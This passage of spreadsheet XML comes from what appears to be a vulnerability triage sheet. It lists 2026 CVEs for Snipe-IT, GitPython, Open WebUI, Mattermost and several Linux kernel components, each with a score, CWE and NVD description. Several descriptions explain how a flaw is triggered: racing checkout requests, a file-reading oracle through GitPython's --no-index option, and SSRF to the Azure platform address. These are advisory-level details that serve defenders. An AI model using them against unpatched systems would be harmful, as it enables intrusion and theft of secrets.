      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr"/>
      <c r="Q758" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="S758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr"/>
      <c r="Q759" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr"/>
      <c r="Q760" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>GitPython 3.1.59 fails to restrict the --no-index option in the high-level diff API, allowing attackers to read arbitrary filesystem paths as repository operands. Attackers can combine --no-index with -I/--ignore-matching-lines to create a content-dependent Boolean oracle, repeatedly querying local files to recover single-line secrets through distinguishable success or error responses.</t>
        </is>
      </c>
      <c r="S760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr"/>
      <c r="Q761" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr"/>
      <c r="Q762" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8821</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr"/>
      <c r="Q763" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate channel member-management permission during playbook run creation, allowing an authenticated channel member to add an arbitrary user to a restricted channel via the run owner field.. Mattermost Advisory ID: MMSA-2026-00677</t>
        </is>
      </c>
      <c r="S763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8821</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89792</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr"/>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: prevent out-of-bounds reads in share config responses
Validate IPC share configuration payload sizes before consuming
variable-length fields. Bound veto list parsing and account for
the separator byte when deriving the path length.</t>
        </is>
      </c>
      <c r="S764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89792</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89818</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr"/>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/vcn: fix integer overflow in dec_msg buffer count check
If the supplied msg[2] (num_buffers) is 0x3FFFFFFF, the expression
6 + num_buffers * 4 wraps to 2 and the bounds check passes, letting
the parser loop far past the end of the message BO. Triggering it
additionally requires a ~4GiB mapping so that msg[1] survives the
earlier "header does not fit in BO" check.
Rewrite the test in division form, which is overflow-free by
construction. Also update the message to reflect that msg is invalid.</t>
        </is>
      </c>
      <c r="S765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89818</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89826</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr"/>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: harden firmware build-info bounds checks
panthor_fw_read_build_info() checks whether the metadata range fits in the
firmware image with hdr.meta_start + hdr.meta_size. Both fields are u32, so
the addition can wrap and let an out-of-bounds range pass validation.
The function also reads the "git_sha: " prefix without first checking that
the metadata is long enough, and meta_size == 0 can underflow the NULL
terminator index.
Use subtraction-based bounds checking and reject metadata that is too short
to contain the expected prefix and trailing NULL byte.</t>
        </is>
      </c>
      <c r="S766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89826</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89838</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr"/>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: limit recovery filename logging to stored length
F2FS stores recovery filenames as a length plus a fixed-size i_name
buffer.  The buffer is not NUL-terminated, but recover_inode() and
recover_dentry() print it with %s.
For a 255-byte filename, recovery logging can read past i_name into the
following raw inode fields.
Print the name with a precision bounded by i_namelen and F2FS_NAME_LEN.</t>
        </is>
      </c>
      <c r="S767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89838</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89840</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr"/>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: validate MOVE_RANGE destination size
F2FS_IOC_MOVE_RANGE checks the source range, but not the destination end
before updating i_size. A source hole can expose this: __clone_blkaddrs()
skips NULL_ADDR entries and returns success, so the caller can still extend
the destination inode with unchecked pos_out + len.
Reject destination overflow and use inode_newsize_ok() before extending
the destination inode.</t>
        </is>
      </c>
      <c r="S768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89840</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89912</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr"/>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-its: Don't dereference a NULL collection on ITT save
MAPC with V=0 drops ite-&gt;collection but leaves the ITE on the device's
ITT list, and vgic_its_save_ite() dereferences it unconditionally. A
guest that issues MAPD, MAPTI and then MAPC(V=0) therefore oopses the
host when the VMM issues KVM_DEV_ARM_ITS_SAVE_TABLES to migrate it.
That sequence is UNPREDICTABLE per the architecture, but KVM already
handles the resulting state in the translate, MOVI and DISCARD paths.
Save a zeroed entry, which vgic_its_restore_ite() reads back as
invalid. Skipping the ITE instead would leave the ITT slot holding
whatever is in guest memory, and restore rejects an entry naming a
collection the restored collection table does not have.</t>
        </is>
      </c>
      <c r="S769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89912</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89927</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr"/>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: x86: hyper-v: Clamp stimer deadline to avoid livelock
Fix an issue where userspace or the guest can program an Hyper-V
synthetic timer to have a deadline in the past via integer overflow,
preventing the CPU from making progress and triggering an RCU stall.
Hyper-V's SynIC exposes 4 per-vCPU synthetic timers to the
guest, which are emulated by KVM. Each is programmed through the
HV_X64_MSR_STIMERi_CONFIG and HV_X64_MSR_STIMERi_COUNT MSRs. Depending
on CONFIG, COUNT represents either the absolute expiration time or the
period of a periodic timer, both expressed in 100ns ticks. These timers
may be set both by the guest (WRMSR) and the host (KVM_SET_MSRS).
When the timer is enabled, stimer_start() translates COUNT to an
absolute monotonic deadline and arms an hrtimer. If COUNT is set to a
value close to U64_MAX, the deadline calculation can overflow.
    ktime_add_ns(ktime_now, 100 * (stimer-&gt;exp_time - time_now))
This can result in a CPU livelock. stimer_start() arms the timer
via hrtimer_start() with a deadline in the past, which causes it to
immediately fire. The stimer callback then raises KVM_RQ_HV_STIMER, with
the intention of causing KVM to deliver a synthetic interrupt on the
next vCPU guest enter.
Then, once userspace issues KVM_RUN, vcpu_enter_guest() consumes the
request, calling kvm_hv_process_stimers(). This would normally disable
the timer via stimer_expiration() once the deadline is in the past.
However, the deadline comparison is done between the KVM reference
counter and stime-&gt;exp_time, which is a big value close to U64_MAX, so
this never happens for a few thousand years.
kvm_hv_process_timers() then re-arms the timer via stimer_start(), since
it was not disabled, which again fires immediately. Before entering
the guest, kvm_vcpu_exit_request() checks kvm_request_pending(),
which returns true due to the newly raised KVM_REQ_HV_STIMER. Then
vcpu_enter_guest() aborts the guest entry, returning early into
vcpu_run(), which loops back again into vcpu_enter_guest(), restarting
the cycle.
Since there are no manual yields in this loop, a task with SCHED_FIFO
may starve RCU grace-period kthreads, which exposes the stalls found
by syzcaller:
    rcu: INFO: rcu_preempt detected stalls on CPUs/tasks:
    rcu:    (detected by 1, t=10502 jiffies, g=14269, q=1142 ncpus=2)
    rcu: All QSes seen, last rcu_preempt kthread activity 10500 (4294965239-4294954739), jiffies_till_next_fqs=1, root -&gt;qsmask 0x0
    rcu: rcu_preempt kthread starved for 10500 jiffies! g14269 f0x2 RCU_GP_WAIT_FQS(5) -&gt;state=0x0 -&gt;cpu=0
    rcu:    Unless rcu_preempt kthread gets sufficient CPU time, OOM is now expected behavior.
        ( ... )
    Call Trace:
     &lt;IRQ&gt;
     __run_hrtimer kernel/time/hrtimer.c:1773 [inline]
     __hrtimer_run_queues+0x408/0xc30 kernel/time/hrtimer.c:1841
     hrtimer_interrupt+0x45b/0xaa0 kernel/time/hrtimer.c:1903
     local_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1045 [inline]
     __sysvec_apic_timer_interrupt+0x102/0x3e0 arch/x86/kernel/apic/apic.c:1062
     instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1056 [inline]
     sysvec_apic_timer_interrupt+0xa1/0xc0 arch/x86/kernel/apic/apic.c:1056
     &lt;/IRQ&gt;
     &lt;TASK&gt;
     asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:697
    RIP: 0010:__raw_spin_unlock_irqrestore include/linux/spinlock_api_smp.h:152 [inline]
    RIP: 0010:_raw_spin_unlock_irqrestore+0xa8/0x110 kernel/locking/spinlock.c:194
    Code: 74 05 e8 0b f4 5f f6 48 c7 44 24 20 00 00 00 00 9c 8f 44 24 20 f6 44 24 21 02 75 4f f7 c3 00 02 00 00 74 01 fb bf 01 00 00 00 &lt;e8&gt; 23 6b 27 f6 65 8b 05 7c 60 5a 07 85 c0 74 40 48 c7 04 24 0e 36
    RSP: 0018:ffffc900040a7320 EFLAGS: 00000206
    RAX: 5de15cb931505900 RBX: 0000000000000a06 RCX: 5de15cb931505900
    RDX: 0000000000000007 RSI: ffffffff8daa9dc3 RDI: 0000000000000001
    RBP: ffffc900040a73b0 R08: ffffffff8fc3d0
---truncated---</t>
        </is>
      </c>
      <c r="S770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89927</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90016</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr"/>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read in rtw_restruct_wmm_ie()
rtw_restruct_wmm_ie() scans in_ie for a WMM IE with:
	while (i &lt; in_len) {
		...
		if (i + 5 &lt; in_len &amp;&amp; in_ie[i] == 0xDD &amp;&amp; ...) {
			...
			break;
		}
		i += (in_ie[i + 1] + 2); /* to the next IE element */
	}
When the "i + 5 &lt; in_len" match check fails simply because i is
within 5 bytes of the end of the buffer (i.e. no WMM IE was found
near the tail of in_ie), execution falls through to
"i += (in_ie[i + 1] + 2)", which reads in_ie[i + 1]. If i == in_len
- 1 at that point, this is a 1-byte out-of-bounds read of an
attacker-influenced IE buffer built from association/scan data.
Commit a75281626fc8f ("staging: rtl8723bs: fix potential
out-of-bounds read in rtw_restruct_wmm_ie") added the "i + 5 &lt;
in_len" guard to the match condition itself, but did not add an
equivalent guard before the fallthrough advance, so the same class
of OOB read remained reachable through the non-matching path.
Add an explicit bounds check before advancing to the next IE.</t>
        </is>
      </c>
      <c r="S771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90016</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90017</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
